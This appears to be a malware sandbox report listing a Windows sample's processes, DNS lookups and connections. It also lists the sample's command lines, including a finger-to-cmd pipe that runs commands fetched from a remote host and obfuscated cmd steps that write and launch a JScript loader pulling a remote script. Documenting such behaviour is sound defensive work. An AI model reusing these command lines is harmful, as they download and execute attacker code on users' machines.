Technical Information
- '<SYSTEM32>\finger.exe' ok@wewr39aegk.hivecloud.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\iyZ.js"
- %LOCALAPPDATA%\iyz.js
- 'we######gk.hivecloud.xyz':79
- 'et####.#yxxuawadkom.date':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'we######gk.hivecloud.xyz':79
- 'cl###flare.com':443
- DNS ASK we######gk.hivecloud.xyz
- DNS ASK et####.#yxxuawadkom.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@wewr39aegk.hivecloud.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt OKIO=.j&&SEt EMMWK=vByYoarByYo a =ByYo 'scByYoriByYoptByYo:'; b =ByYo 'hByYoTtPByYo:'; GByYoetByYoObjByYoecByYot(ByYoa+b+'&&sET OU4X=RBOESRBOESeteehv.cyxxuawadkom.dateRBOES?1RBOES')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 8BOUY="%EMMWK:ByYo=%%OU4X:RBOES=/%" 0<nul 1>%LOCALAPPDATA%\iyZ%OKIO%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\iyZ%OKIO%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\iyZ.js